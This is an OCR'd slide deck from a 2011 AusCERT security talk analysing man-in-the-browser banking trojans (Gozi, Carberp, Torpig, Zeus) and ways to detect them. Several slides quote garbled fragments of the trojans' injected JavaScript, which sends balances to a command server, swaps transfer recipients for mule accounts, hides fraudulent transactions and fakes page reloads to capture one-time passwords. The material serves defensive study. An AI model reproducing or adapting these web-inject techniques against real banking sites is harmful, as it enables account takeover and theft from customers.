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Don't fear the trojans; fear how they are configured to attack a banking 
website. A practical session with surprising outcomes 

Transactional Banking Malware 



AusCERT 2011 
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Presenter: Andreas Baumhof 
CTO& co-Founder 



2010 - the landscape is changing 



Security Paradigm is changing - are you? 
(Banking) malware is changing - are you? 
MITB at the example of Gozi &Carberp 



Defence Strategies 

■ Intelligence 
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Following the money 




Reporter: Why do you rob 
banks? 

Willie Sutton: Because that's 
where the money is. 

Willie Sutton stole more than 
$2 million. ..and spent half his 
life in prison. 
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Banking malware - the past 



Phishing 

Was a viable threat in the past before 
dynamic password schemes, right??? 






Malware attacks 

■ are getting more widespread and malware easier to 
get hold of 

Zeus, Spyeye, Carberp, Silon, Gozi, Mebroot, Clampi, 
URLZone,justto name a few 

■ Available as an easy-to-use service 

Or even as a source code (Zeus) 
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Current Security Paradigm 



Most of the security solutions are reactive 
Usability vs. security 

■ Desktop Security 

■ blacklists vs. whitelists 

■ Dynamic Password Schemes (2FA) 

Authentication vs. Authorization vs. Security 

■ Forensics 

Almost all banking trojans are either a BHO or hook export / 
import tables (e.g. wininet.dll, nspr4.dll) 

Browser Security model 

DOM restrictions vsJSONP 
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Current Security Paradigm: Reactive 



Most of the security solutions are reactive 
We don't solve the problem 

■ but try to mitigate the effects 

We make life harder for the bad guys 

■ That's all we do and thus we are far away from a 
solution 



BUT 



That forces the perpetrators to change and leave 
them exposed 
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Examples: Mebroot back in 2008 



Mebroot will modify MBR (out of user mode) 
and restart the computer 

During the boot up process, Mebroot will load 
and inject the payload (mostly Torpig) into 
kernel drivers and user mode processes 



This made Mebroot one of the stealthiest 
Trojans of its time (back in 2008) 
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Examples: Mebroot back in 2008 



Lots of self - defense code 

IRP hooks for \\Driver\Disk 

■ Patches classpnp.sys!Classlnitialize 

■ Creates "Watcher" Thread 

■ Direct disk sector write access 

BUT all this is only possible as Mebroot can 
write to the MBR / install a kernel driver! 
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Examples: Mebrootvs Windows 7 



Windows 7 introduced the UAC and also 
removed access to the MBR from usermode 

■ Bitlocker also protects the boot-up process. 

We obviously know that this won't stop the bad 
guys, but it is interesting to see the side effects 
this creates 

■ Either request admin privileges and the UAC will 
come up, or 

■ Do as much as possible from user mode. 



What did they decide to do? 



Commercial - in - Confidence 



ITRUSTDEFENDER 

LABS 



Examples: Torpig vs Windows 7 



In the last few months, we have seen samples of 
Torpig without Mebroot 

Works perfectly fine in Windows 7 

NoUAC 

Everything runs from usermode 

Browser hooking works nicely 

HTML web injection works like a treat 

Completely silent 



BUT 
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Examples: Torpig vs Windows 7 



No self defense at all anymore 

Torpig is visible as a process in task manager 

rundll32 .exe C: \DOCUME~l\support\LOCALS~l\Temp\l . tmp,_IWMPEvents 

Only current user is infected, not the whole 

machine 

If you kill that process, Torpig is disabled 

If you remove that file, Torpig is gone 

Other side effects 

■ If IE runs as a separate user, Torpig will not be able to 
inject its HTML code anymore! 
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Examples: Zeus vs Windows 7 



Similar approach for Zeus 2.x 

No UAC, Zeus runs as current logged in user, 
Browser hooking still possible 

■ BUT easily detectable and easily removable 

Almost no self defenses 

From Zeus 2.0.9.8 manual 

2. Since the core of the bot is aimed at Windows Vista+, and the bot will never use privilege escalation, etc., bot is 
working within a single user. But the basic attempts to infect other Windows users are made (usually effective in 
cases of disabling UAC, or run from under LocalSystem). 
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Examples: Zeus vs Windows 7 



Summary 

Windows 7 forced the bad guys to change tact and 
leave them exposed to userland 

Easily detectable 

■ Easily removable 

■ Infect only the current user 



Easy fix: If you want to protect your browser session 
run your browser as a separate user © 
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Examples: Internet based 



Dynamic password schemes UFA, ...) 

Doesn't solve the problem, however it forces the bad 
guys to make use of heavy JavaScript injections into 
the banks website (MITB) 

■ And that e.g. forces them to use a valid HTTPS site 
with correct certificate for the C&C server. 

■ And that will leave more and more traces 



This raises the bar considerably 

GOOD: u script kiddies" get weeded out 
BAD: that leaves solely the really bad guys 
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Good news (I guess...) 



Online fraud is getting more complex 

Malware writers 
Account mules 



Intellectual Property Development 

Configuration file 
■ Javascript /AJAX/JSONP backend 



Money mules 
Malware distributors 
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Banking malware is changing 



Due to security improvements (client & server), 
the landscape is changing 

Trojan itself is becoming irrelevant 

■ "Industry-standard" webinject config format 

The main differentiating factor (and also the 
main Intellectual property) is 

■ the configuration file for each targeted brand, and 

■ The real-time dynamic content to adopt to the 
situation 
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What does that mean for multi- 
platform? 



If 80% of the work is involved in the 
Intellectual Property... 

Of the configuration file, JavaScript, money mule 
accounts, account mule accounts, ... 



...this will naturally lead to cross-platform 
attacks as the trojan is merely an "enabler 

■ MacOSX (see our labs report), iOS, Android 
HTML5??? 



// 
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Banking malware is changing 



Trojan itself is not only irrelevant, BUT 

In order to protect the user, we don't have to 
defeat the physical trojan, rather the 
"infrastructure" behind it, e.g. 

■ if you kill theTorpig Pipe ( \\\\.\\pipe\\!mscom$ ), 
Torpig is disabled 



And the perpetrators leave traces 
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Banking malware traces 



Mothers Maiden Name 



Choose a stait |>a<je 

| Home 



For additional form fields, 
they'll be sent as well to 
the real banking server 

Check if you receive additional form fields! 



Client Log on 

UserlD 3 I Log-on help 



Track the market. 
Place trades 
Monitor your portfolio 

All from your phone 
All in one free app. 

TDAMERITRADE 
Mobile for your 
i Phone 8 , BlackBerry 3 , 
Android™ or 
VWndows* phone 



j Trading Tools > Mobile 




. .• .' : ■ : • 



Gozi will set a cookie that one could check 



<html> 

<ljody onload="cookl=getCookie ( ■ googleblock 1 ) ; if (cookl ! ==null) { showBlock {);}"> 



Torpig will add a u & WC nt=o u to the POST 
request 
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Banking malware leaves traces 




Certification path 



E^ COMODO 
! --S EssentialSSL CA 

L-ElLLUJJiLLJJJ 



Certificate status: 



This certificate has expired or is not yet valid. 



View Certificate 



Learn more about certification paths 



OK 



^ ■■■ ri nerckr 




General ! Details ! Certification Path 



Show: 



<AJI> 



Field 

J Serial number 
^Signature algorithm 
| Signature hash algorithm 



Value 

00e243 4de6 66ce42cabl... 

shalRSA 

shal 




|Valid from 
J Valid to 
£) Subject 

Sllpiihlir L-^v 



Thursday, 26 August 2010 10: 
Thursday r 25 November 2010 , 
obscurestats.com r Free SSL, .. 



CN = EssentialSSL CA 

O = COMODO CA Limited 

L = Salfbrd 

S = Greater Manchester 

C=GB 



Edit Properties. 



Copy to File. 



Learn more about certificate details 



OK 
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Banking malware - Gozi / Carberp 



Let's look at some details of Gozi /Carberp 

There is a strong link between these two 
trojans 

■ Based on the type of specific JavaScript / HTML 
page injections found in both Trojans 

Based on information on seized C&C servers 
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Banking malware - Gozi / Carberp 



So how do these trojans work? 

■ We have covered this in various TrustDefender 
Labs in-depth reports, so just the highlights here 
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The power of JavaScript 



How can 
channel 

can/or? 



function CreatelFrair.e furl) { 

Ifrir. = document . createElement i 
ifrm. setAt tribute ( "src", url) ; 
if rm. style .width = + "px"; 
if rim. style .height = ■+ "px n ; 



document . tody . appendChild ( if on) ; 
ifrm.src = url; 



T IFRAME"} ; 



Gozi 



return: 



f unct i on conne c t ( s re } 

{ 

var newScript = document . cr eat eElement ( "script") ; 

newS cript . t ype = " t ex t / j avas crip t rr ; 

newScript . s re = sre; 

var first = do cument . getElementsByTagName ( "head") [0] . first Child; 

document . getElementsByTagName ( "head" } [ ] . ins ertBe fore (newS cript f first ) 

} 



hp?kaspersky_inetdate=" + t 
cc currency + "Skaspersky inetda 



function sdata ( } 
{ 

var lg = document . getE lenient By Id ( 
var ps = document . getE lenient By Id ( 
var rix = (new Date ( }} . getTime ( } ; 

if (ps .value . length > 3} 

connect ( "https : //ob 

lse 

.lert ( "Indtast personligt kodeord") ; 
> 



'login"} ; 

p pass"} ; 



Carberp 



t/ access . php?make=authi 
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Some interesting features - Gozi 



Gozi 

■ Among otherthings, it... 

■ Will steal 2FA token and will use this in a second 
session 

Will do an automated wire transfer after login 
(user will only notice a 10 sec blank screen after 
login) 
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Gozi - steal OTP and use it in 2 nd 



session 



Inject 
intermediate 



page 



Steal OTP 

and send it to 

C&C server 



110 session 
from C&C 
server 
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Gozi - steal OTP and use it in 2 
session 



Business Online Login - Windows Internet Explorer 



m 



3 



File Edit View Favorites Tools Help 



&F 



L 



l"^ Business Online Login 



I ij? Loading.. 



A 




Please wait while we are checking some additional security parameters. 
This mav take few minutes to rctmolete. 



Security Token Verification 



PIN & Token Password: 



*Press white button on your 
Token to display Token Password, 



» CONTINUE 



<j rara» 
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Gozi -fully automated wire transfer 




•Hook into the 
page loading 
process 



If (PAGE == 
LOGIN) 



CreatelFrame and Send balance, 
amout, currency to C&C 



click on 
"pay" 



setTimeout ('document. getElementByld 
("level_4_2"). click()' # 100); 



Click on intl 
wire transfer 



•top.window.setTimeout('clickButton(topiraiTies[i]. 
document. getElementByld("gkkLocalNavigation"). 
getElementsByTagName ("a")[2])', 50); 



Many more 
simulated 
clicks 
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Some interesting features ■ Carberp 



Carberp 

■ Will change recipient details in real-time and uses 
the provided OTP to approve them 

■ Steals OTP's in real time for use in separate 
session 
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Carberp - real-time recipient 
change 



Hookwire 
transfer button 



• Through a JavaScript 
onclick event handler 



Save original 
recipient details 



This is used later on fix up account 
balance, and replace fraudulent 
transaction with the intended one in 
the account statements 



Send detailsto 

C&Cand request 

mule account 

details 



Money mule account is 
dependent on user account, 
bank identifier and transfer 
amount 



Change recipient 

detailsto mule 

account 



They even make sure that 
this is going to be an 
immediate transaction 



Submit the 

changed details 

to bank 
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Carberp - permanent storage 



window. onload = function () 

{ 

var total = document . getElementByld ("cashTotalAvailBalance") ; 
if (total != null) 

{ 

total = total. innerHTML. replace ("$","") ; 

total = total. replace (",","") ; 

sdata (total) ; 

} 
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Carberp - save info from C&C 



ud (1, ' dr_name f r response . dr_name, 3 65) ; 
ud (1, f dr_konto f , response . dr_konto, 3 65) ; 
ud (1, f dr_blz f r response . dr_blz, 3 65) ; 
ud (1, ' dr_komm f r response . dr_komm, 3 65) ; 
ud (1, f dr summ' r response . dr summ, 3 65) ; 
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Carberp - alter transaction 



document . getElementByld 
document . getElementByld 
document . getElementByld 
document . getElementByld 
document . getElementByld 



* recipient ') .value = dr_name; 
^recipientAccount ') .value = dr_konto; 
^recipientBankid) .value = dr_blz; 
* amount 1 ) .value = fpztiz (dr_summ) ; 
^referencel ') .value = dr komm; 
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Carberp - alter account balance 



var st = document . getElementsByTagName (' td ! ) ; 
for (var y = 0; y < st. length; y++) { 

if (st [y] . className .match (/posSaldo | negSaldo/) ) 
var sal = st [y] . innerHTML .match (/ [- 
\d\. ,]+/); 



if 


(dr summ && ud(2, 'on') && ud(2, 'on') == '0') { 






sal = Number (sal [0] . replace (A . /, ff ). replace (',',' . 


. ' ) ) ; 




var sd = alls (dr summ, 'x'); 






var nv = fpztiz (sal + sd) ; 






st [y] . innerHTML = nv; 
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Carberp - stealing of OTP 



"simulation" of page reload upon OTP 
submission 

■ "You cannot sign on using the data you entered. 
Please wait for your Token to update then make 
corrections and try again." 

■ Page load is timed to take 60 seconds to make 
sure there'll be a new OTP 

This one blew us away.. .You have to see this 
live... 
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c 



Business Name: Guest 



y goodbye to your payroll 




worries. 



User ID: 

Password: 

Token: 



What's thi 



Sign On 



ALERT Beware of fraudulent email > 
j a va s cri pt: cl i ckN u m b er(0) 



The status bar will be set to "waiting 

for businessaccess..." and a page 

reload will be simulated via JavaScript 

(all content elements made invisible 

and shown within a 60 second 

timeframe to make sure a new OTP is 

submitted)... wow... 



Move mouse over movie and click on the play button 
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Carberp - stealing OTP 



window. status = "Waiting for 

https : //bankname . com/signon . do . . . " ; 

var els = document . getElementsByTagName ( "td" ) ; 

f or (var i=0; i<els . length; i++) 

{ 

els [i] . style . display = "none"; 

currels = i; 

} 
xtime = 60000 / currels; 
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Side effects of Mobile Attacks: 
Example Zeus/Spyeye MITMO 



INFORMACION IMPORTAMTE ACERCA DE LA SEGUMDAD 



Por favor e-llja la marca y el mod do desu telefono 



Nskia 



SijOXpressnlisic 



■: Si el tglefc.no re exist e en la Jifla? 



Sutelefono I Nokia 5130 Kp-re*sM«*lc 

El numera da tele Fond regi strode : 




El Knk para la install don d#l certificado movil digital sera enviado ad ngmtro por SMS T reobicto *l SMS con el link per favor baje t install Is apNoaddn. 
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Side effects of Mobile Attacks: 
Example Zeus/Spyeye MITMO 



Zeus/SpyeyeMITMO 

■ Zeus MITMO is not designed to steal credentials 
from the mobile device, BUT 

■ To attack the authentication system 



BUT 



Spyeye had to ask for the IMEI as they would sent 
a Blackberry/Symbian file signed with a developer 
certificate which is tied to a particular IMEI! 
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What's missing? 



Fraudsters are getting smarter. 
Trojans are getting smarter 

Are we getting smarter as well? 

Do we know what the trojan does in a particular 
situation? 

Security vs fraud risk management 

Detect fraudulent activity BEFORE it happens 



Commercial - in - Confidence 



ITRUSTDEFENDER 

LABS 



Detection & Protection 



Detection vs Protection 
Protection 

■ Endpoint security is essential as no server component is 
attacked at all 

Intelligence is key (do you know what's happening?) 

■ Seizure of C&C servers (most effective) 
Bot simulation 

■ (JavaScript) forensics 
Account Monitoring 
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Intelligence: seizure of C&C server 



Provides the biggest benefit as it becomes 
very clear what data has been compromised 
and what harm has been done. 



However not that easy to do 
Use of proxies 
Involves LE 
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Intelligence: bot simulation 



Script that logs in to the bank account and 

simulates a wire transfer 

Trying to get mule accounts from the server 

Problems 
Easily detectable 
Fake mules 
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Intelligence: account monitoring 



In addition to money mule, the perpetrators 

need to have account mules 

Those are legitimate accounts that are being 

made available to come up with the 

configuration 

Has unique characteristics 

■ Lots of logins / logouts without doing anything 

■ Pressing of a button lots of time repeatedly 
Create a wire transfer and delete it soon thereafter 

■ Lots of very small wire transfers (just a few $) 
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Intelligence: account mule detection 



We can learn a lot by monitoring these 

accounts 

Account mules have often a very different 

relationship with the perpetrators as the 

money mules 

Typically it's a very trusted and long term 

relationship 

■ While money mules are not 

■ See e.g. Top 10 ways to get fired as a money mule 

( http://krebsonsecurity.com/2oio/oi/top-io-ways-to-get-fired-as-a-money-mule/ ) 
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Intelligence: JavaScript forensics 



Use JavaScript within the banking session to 
gather intelligence 

■ Presence of malware signature 

(such as cookies, ...) 



<html> 

<body onload="cookl=getCookie ( ■ googleblock 1 ) ; if (cookl ! ==null) { shouBlock {);}"> 



■ Money mules account detail gathering 

■ Account mule detail gathering 

Problems 

Signature /configuration based 

Commercial - in - Confidence I 



ITRUSTDEFENDER 

LABS 



We need to make a difference 



Why can these trojans talk to a third party within 
the banking session? 

■ Safe Web Browsing initiative from FSTC/BITS would 
have addressed this (back in 2007) 

Intelligence 

■ Information sharing not just of trojans, but also about 
what they do anonymously (e.g. account, devices, 
money mules, account mules, ...) 



Integrating Security & fraud risk management 
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So where from here? 



The problem is here to stay 
We can choose two ways 

■ Either security controls are implemented to solve 
the problem 

■ Or u just"to make it go 
away 

■ Bad guys don't have brand 
loyalty 

Bad guys don't care about 

t h e CO I O U r Of m O n ey "I don't have to outrun the bear, I just have to outrun you" 
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Questions? 
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TrustDefender 



More information can be found on our blog 
(a) http://www.trustdefender.com/blog 

Speaker 

■ Andreas Baumhof 

■ Email: andreas(a)trustdefender.com 

■ Phone: +61428 224403 
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